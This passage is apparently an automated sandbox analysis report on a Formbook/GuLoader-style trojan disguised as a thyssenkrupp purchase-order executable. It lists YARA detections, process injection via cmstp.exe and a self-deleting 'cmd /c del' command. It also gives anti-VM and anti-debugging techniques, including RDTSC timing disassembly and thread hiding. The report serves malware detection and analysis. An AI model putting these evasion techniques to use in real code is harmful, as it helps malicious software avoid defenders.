      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.921254049.0000000002EBE000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@4/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile created: C:\Users\user\AppData\Local\Temp\~DF19C1EAA8A3135A4C.TMPJump to behavior
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeVirustotal: Detection: 30%
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeReversingLabs: Detection: 14%
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'Jump to behavior
      Source: Binary string: cmstp.pdbGCTL source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.735175160.0000000005A00000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761860471.000000001E380000.00000040.00000001.sdmp, cmstp.exe, 00000006.00000002.921795937.0000000004BEF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, cmstp.exe
      Source: Binary string: cmstp.pdb source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.735175160.0000000005A00000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6304, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6780, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6304, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6780, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_00406655 push FFFFFFD3h; ret 0_2_0040665B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_004113EC push eax; ret 0_2_0041142B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3FD0D1 push ecx; ret 1_2_1E3FD0E4
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_0008E3E6 pushad ; ret 1_2_0008E3E7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000B71BE push esi; ret 1_2_000B71E6
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000AE26A pushfd ; retf 1_2_000AE27D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B4D0D1 push ecx; ret 6_2_04B4D0E4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0296E26A pushfd ; retf 6_2_0296E27D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_029771BE push esi; ret 6_2_029771E6
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297CE95 push eax; ret 6_2_0297CEE8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297CEE2 push eax; ret 6_2_0297CEE8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297CEEB push eax; ret 6_2_0297CF52
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979E3A push ss; ret 6_2_02979E3B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297CF4C push eax; ret 6_2_0297CF52
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile created: \purchase order updates thyssenkrupp materials australia 900-5400006911.exeJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 00000000021F80C7 second address: 00000000021F80C7 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0468D3DF38h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dh, ch 0x00000021 cmp al, al 0x00000023 test bl, cl 0x00000025 add edi, edx 0x00000027 dec dword ptr [ebp+000000F8h] 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007F0468D3DEE5h 0x00000036 jmp 00007F0468D3DF5Eh 0x00000038 cmp dx, dx 0x0000003b call 00007F0468D3DFBEh 0x00000040 call 00007F0468D3DF4Ah 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692728631.00000000021F0000.00000040.00000001.sdmp, Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 00000000021F80C7 second address: 00000000021F80C7 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0468D3DF38h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dh, ch 0x00000021 cmp al, al 0x00000023 test bl, cl 0x00000025 add edi, edx 0x00000027 dec dword ptr [ebp+000000F8h] 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007F0468D3DEE5h 0x00000036 jmp 00007F0468D3DF5Eh 0x00000038 cmp dx, dx 0x0000003b call 00007F0468D3DFBEh 0x00000040 call 00007F0468D3DF4Ah 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 00000000021F8112 second address: 00000000021F8112 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0468D32A96h 0x0000001f popad 0x00000020 call 00007F0468D32516h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 00000000021F8C4E second address: 00000000021F8C4E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 cmp ebx, eax 0x00000006 je 00007F0468D3E1AFh 0x0000000c cmp byte ptr [ebx], FFFFFFB8h 0x0000000f jne 00007F0468D3DF1Bh 0x00000011 pushad 0x00000012 mov ebx, 00000066h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 0000000000568112 second address: 0000000000568112 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0468D32A96h 0x0000001f popad 0x00000020 call 00007F0468D32516h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 0000000000568C4E second address: 0000000000568C4E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 cmp ebx, eax 0x00000006 je 00007F0468D3E1AFh 0x0000000c cmp byte ptr [ebx], FFFFFFB8h 0x0000000f jne 00007F0468D3DF1Bh 0x00000011 pushad 0x00000012 mov ebx, 00000066h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000029698E4 second address: 00000000029698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002969B5E second address: 0000000002969B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8987 rdtsc 0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe TID: 408Thread sleep count: 180 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7136Thread sleep time: -54000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exe TID: 808Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692728631.00000000021F0000.00000040.00000001.sdmp, Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000004.00000000.739898951.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.735567164.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.740594811.000000000A839000.00000004.00000001.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&\
      Source: explorer.exe, 00000004.00000000.739898951.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.731025210.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: explorer.exe, 00000004.00000000.740094180.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000004.00000000.740094180.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
      Source: explorer.exe, 00000004.00000000.733153621.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0A52 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,021F08C6,00000000,00000000,000000000_2_021F0A52
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8987 rdtsc 0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F4B8D LdrInitializeThunk,0_2_021F4B8D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8987 mov eax, dword ptr fs:[00000030h]0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8A17 mov eax, dword ptr fs:[00000030h]0_2_021F8A17
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F6F79 mov eax, dword ptr fs:[00000030h]0_2_021F6F79
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F879F mov eax, dword ptr fs:[00000030h]0_2_021F879F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2F90 mov eax, dword ptr fs:[00000030h]0_2_021F2F90
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2FAD mov eax, dword ptr fs:[00000030h]0_2_021F2FAD
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F6BFB mov eax, dword ptr fs:[00000030h]0_2_021F6BFB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2FF1 mov eax, dword ptr fs:[00000030h]0_2_021F2FF1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F87E9 mov eax, dword ptr fs:[00000030h]0_2_021F87E9
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2C1D mov eax, dword ptr fs:[00000030h]0_2_021F2C1D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F7C2F mov eax, dword ptr fs:[00000030h]0_2_021F7C2F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2468 mov eax, dword ptr fs:[00000030h]0_2_021F2468
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8959 mov eax, dword ptr fs:[00000030h]0_2_021F8959
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F41A1 mov eax, dword ptr fs:[00000030h]0_2_021F41A1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]1_2_1E46AE44
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]1_2_1E46AE44
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3AE620 mov eax, dword ptr fs:[00000030h]1_2_1E3AE620
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]1_2_1E3DA61C
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]1_2_1E3AC600
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]1_2_1E3D8E00
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E461608 mov eax, dword ptr fs:[00000030h]1_2_1E461608
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]1_2_1E3CAE73
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B766D mov eax, dword ptr fs:[00000030h]1_2_1E3B766D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E45FE3F mov eax, dword ptr fs:[00000030h]1_2_1E45FE3F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]1_2_1E3B7E41
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]